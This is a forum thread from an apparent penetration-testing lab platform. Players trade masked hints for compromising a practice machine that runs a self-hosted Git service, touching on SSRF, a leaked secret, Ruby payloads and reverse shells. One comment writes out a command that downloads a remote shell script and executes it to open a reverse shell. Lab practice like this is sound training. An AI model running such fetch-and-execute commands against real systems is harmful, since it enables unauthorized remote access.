Official Laboratory Discussion

Comments

  • Rooted!
    Definitely not an easy box. As usual, foothold is harder than user and root. The 502 error is for sure annoying and distracting.

    Set up your own environment; it doesn't have to be via Docker. Just a simple standalone VM.
    Big thanks to @PrivacyMonk3y

    ruskii

  • Having trouble creating the payload.. I can create files and modify them just fine but can't reverse

  • @alphaomega said:

    Having trouble creating the payload.. I can create files and modify them just fine but can't reverse

    Think about what's going on when you're doing the other files.
    Break that process down. Can you use the same method it's using?

    The poc is using pipes... that's interesting isn't it?

  • @PrivacyMonk3y said:

    @alphaomega said:

    Having trouble creating the payload.. I can create files and modify them just fine but can't reverse

    Think about what's going on when you're doing the other files.
    Break that process down. Can you use the same method it's using?

    The poc is using pipes... that's interesting isn't it?

    I managed to finally get the g*t user. Not sure what poc is!

  • Felt like I was on the verge of getting RCE but got so stuck I tried resetting the machine as a last resort, and now only 502 errors like others have mentioned. Is there a trick to getting around those?

  • Switched VPNs and I'm back in business. Although it doesn't fix it for anyone on that original VPN.

  • edited November 2020

    I can get some file exfiltration, but not much more. Do I need to set up a local G***** instance and poke around it to see what files to take or is that a time waste? Cheers.

    EDIT: afaik I can only grab files that the g*****-w** user has perms to view (or one of the g*****-xxxxx users)

  • @andrenl said:

    Got a foothold and landed on a limited D****r C*********.
    Any nudges on how to get user?

    Hint:

    Google basic commands research on G****-r**** C******.
    You should think about what to do with D*****.
    If you need something, PM.

  • Spoiler Removed

  • Hi guys, there must be another trick than using R**** C******.

  • @mohsinhakak said:

    Whoops, GitLab is taking too much time to respond. Been like this for days. Any information on how to get rid of this, please PM. Thanks.

    Same here, it worked great for me before

  • edited November 2020

    Hmm, I leaked the secret, but I can't get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested, but still no luck. Any tips?

  • Stuck on the foothold. I've found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but haven't found a way to turn this into anything yet. Searched for CVEs but haven't found any that are useful. As usual, I may have missed something obvious?

  • Rooted :wink:

    That was an easy box?
    I don't think so...
    Thanks, @n3ph0s for the nudge on foothold.

    Feel free to PM if any help is needed.

  • Guys, I'm stuck at the beginning. Can someone DM me a hint to start with? I did a service scan and I can't get anywhere around the website.

  • Rooted!

    Why am I so distracted and overlooking things???
    Contrary to everyone, the user was easier than the root!

    Might be luck, but things just went the right path (even without using Docker prior to this)...

    foot:

    • look carefully (enumeration)
    • Some things (do.. cof... mains) are just a pot full of honey...
    • Find the version and build piece by piece with that (find that POC)
    • When exploiting, if the payload fails, check what was said about the "=" symbols (I did not have that issue though)
    • Remember what was also said: the machine might not have the bins you want/need

    user:

    • It was already mentioned (if you can't crack/find, just hammer the guts and reset the machine!)

    root:

    • Enum (latest) might help you over Peas on this one
    • When the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

    If nudges are needed, honk the horn on PM

  • edited November 2020

    Thought I'd have a nice little time on this box, but it seems to be 502'ing everything for me after stops/starts/resets :(

    Edit: I had to change servers for it to work.

  • Actually got a shell but no idea about how to find the user flag.

    Please send me some nudges.

  • edited November 2020

    I've reached the gi**ab page, registered an account, discovered the L_I, but can't understand how to get R_E. I've read about ss*f but it says import URL is blocked. Am I on the right path? I'm blocked..

  • Spoiler Removed

  • This box made me sweat. There are still some mysteries that I have not solved, like why some payloads work for one person and not another...

    I spent a lot of time setting up the env.

    It is not an easy box for me.

    If you need help, PM.

    SpawnZii

  • Yikes, this is not an easy box for me.

    I thought I had some plain ruby working for generating the payload, but it's just not accepted. The 'other' more convoluted doc*** route has also failed to generate a payload which works.

  • edited November 2020

    Hint for those struggling with a foothold: If you get a "Something went wrong" error, try a different bin

    cmoon
    OSCP

  • What I suggest for those with payload problems is: download a shell script from your local Python http.server to perform the reverse shell; special symbols may cause problems.

    This approach got me good: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh

    Trying the bash rev shell directly did not work for me, and the one I said above was reliable every time (used it like 6 times due to resets and stuff).

  • Having zero luck getting the payload to hit a local web server. This one has bested me.

  • @trcm said:

    Having zero luck getting the payload to hit a local web server. This one has bested me.

    How are you generating it??

  • edited November 2020

    I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.

  • Aha, progress. I had to add "--timeout=3 --tries=1" as wget wasn't reaching my web service and was executing in place on the rails console, borking the erb instance it seems.

  • Rooted. The hardest part was finding the foothold. Thanks @siurana for the nudge. After finding an article with the right path, the rest was straightforward. Thanks @0xc45 for a fun box!

  • Alright, I think I know the vulnerability, but can someone help me with how to exploit it?
